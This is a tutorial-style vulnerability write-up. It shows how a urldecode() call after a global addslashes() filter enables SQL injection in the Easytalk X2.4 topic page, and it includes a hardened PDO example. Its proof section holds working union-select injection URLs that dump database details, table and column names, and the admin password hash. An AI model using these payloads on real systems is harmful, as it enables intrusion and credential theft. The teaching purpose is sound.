0x01 background
Most of today's web applications have a global filter against SQL injection: PHP's magic_quotes_gpc is turned on, or a global file such as common.php runs addslashes() over every received parameter, escaping single quotes in particular. To get past such a filter we need to find a decoding function in the code that runs after it; this article looks at urldecode(). Experts can skip this one.
The vulnerability was reported on WooYun: http://www.wooyun.org/bugs/wooyun-2014-050338
0x02 Environment Setup
For the test environment we use an older version of the Easytalk program, version X2.4.
① I packed a copy of the source: http://pan.baidu.com/s/1bopOFNL
② Extract it into the easytalk directory under www and follow the installer prompts step by step (search Baidu or Google for any problems you hit). After a successful install, visiting the site looks like this:
0x03 Vulnerability Analysis
First look at the source layout. It is built on the ThinkPHP framework, so it is fairly complex:
Those interested can study it and then continue; beginners only need to know that ThinkPHP filters the received parameters and applies the appropriate handling depending on whether your server has GPC (magic_quotes_gpc) turned on:
1. /thinkphp/extend/library/org/util/input.class.php, line 266:
```php
/**
 +----------------------------------------------------------
 * If MAGIC_QUOTES_GPC is off, this function escapes the string
 +----------------------------------------------------------
 * @access public
 +----------------------------------------------------------
 * @param string $string  the string to be processed
 +----------------------------------------------------------
 * @return string
 +----------------------------------------------------------
 */
static public function addslashes($string) {
    if (!get_magic_quotes_gpc()) {
        $string = addslashes($string);
    }
    return $string;
}
```
2. Using the global search of the Seay code audit system, search for files containing the keyword "urldecode". TopicAction.class.php turns out to urldecode the received keyword parameter and use it in a SQL query:
3. Following up in that PHP file, we find that the received keyword is passed through urldecode and then taken straight into the query, causing the injection:
```php
public function topic() {
    // urldecode the received keyword parameter via ThinkPHP's _get
    // (see http://doc.thinkphp.cn/manual/get_system_var.html)
    $keyword = $this->_get('keyword', 'urldecode');
    if ($keyword) {
        // OK, straight into the query
        $topic = D('Topic')->where("topicname='$keyword'")->find();
        if ($topic) {
            $isfollow = D('Mytopic')->isfollow($topic['id'], $this->my['user_id']);
            $topicusers = D('Mytopicview')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select();
            $widget = M('Topicwidget')->where("topicid='$topic[id]'")->order('order ASC')->select();
            if ($widget) {
                foreach ($widget as $val) {
                    $topicwidget[$val['widgettype']][] = $val;
                }
            }
            $this->assign('topicwidget', $topicwidget);
        } else {
            $count = $isfollow = 0;
        }
        $this->assign('comefrom', 'topic');
        $this->assign('keyword', $keyword);
        $this->assign('topic', $topic);
        $this->assign('topicusers', $topicusers);
        $this->assign('isfollow', $isfollow);
        $this->assign('subname', '#' . $keyword . '#');
        $this->display();
    } else {
        // redirect to the topic index; the name of the call was lost in extraction
        ('/?m=topic&a=index');
    }
}
```
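The failure mode above, as an added illustration that is not Easytalk's or ThinkPHP's own code: a value that reaches the script as aaa%27 passes a global addslashes() untouched, and the later urldecode() turns it back into a quote; the hardened version binds the decoded value with PDO instead of interpolating it (the et_topic table and the in-memory SQLite database are assumptions made for the demo).

```php
<?php
// Added demonstration, not Easytalk's or ThinkPHP's own code. Shows why a
// urldecode() run AFTER a global addslashes() filter defeats the filter, and
// the fix: bind the decoded value instead of splicing it into the SQL string.

// Stand-in for the framework filter (ThinkPHP's Input::addslashes): escapes
// quotes in every incoming parameter when magic_quotes_gpc is off.
function globalFilter(string $param): string
{
    return addslashes($param);
}

// Vulnerable pattern from the article: decode the already-filtered value,
// then splice it straight into the WHERE clause.
function buildWhereVulnerable(string $filtered): string
{
    $keyword = urldecode($filtered);
    return "topicname='$keyword'";
}

// Hardened version: decode once, then let the driver quote the value. With a
// bound parameter the global escaping is no longer what keeps the query safe.
// Table name et_topic and the in-memory SQLite database are assumed for the demo.
function findTopicSafely(PDO $pdo, string $param): array
{
    $keyword = urldecode($param);
    $stmt = $pdo->prepare('SELECT id, topicname FROM et_topic WHERE topicname = :name');
    $stmt->execute([':name' => $keyword]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// PHP decodes the query string once, so keyword=aaa%2527... arrives as this
// constructed value; the %27 is not yet a quote, so the filter has nothing to escape.
$received = "aaa%27 and 1=2 union select 1,2,3,4,5 %23";
$filtered = globalFilter($received);

echo "filtered  : $filtered\n";
// The second decode re-creates the quote after the filter has already run,
// so the printed WHERE clause now contains the attacker-controlled tail.
echo "vulnerable: ", buildWhereVulnerable($filtered), "\n";

$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE et_topic (id INTEGER PRIMARY KEY, topicname TEXT)');
$pdo->exec("INSERT INTO et_topic (topicname) VALUES ('aaa')");
// The whole decoded string is compared literally as one value, so the
// injected tail matches no row instead of changing the query.
$rows = findTopicSafely($pdo, $received);
echo "hardened  : ", count($rows), " row(s) matched\n";
```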
0x04 Vulnerability Proof
1. We construct a POC that obtains information about the database:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,concat(database(),0x5c,user(),0x5c,version()),5 %23
The following information was obtained:
Looking at the MySQL log below, the SQL statement was executed successfully:
2. We construct a POC that lists all the tables of the Eazytalk database:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x6561737974616C6B),5%23
All the table names are obtained as follows:
3. Construct a POC that gets all the column information for the table et_users:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name=0x65745F7573657273),5%23
All columns of the table et_users are obtained as follows:
4. Construct a POC that obtains the first account in the et_users table:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT user_name,0x5f,password) from et_users limit 0,1),5%23
The admin account and password from the table are obtained as follows:
Those years we dug together SQL injection-2. Global Protection Bypass UrlDecode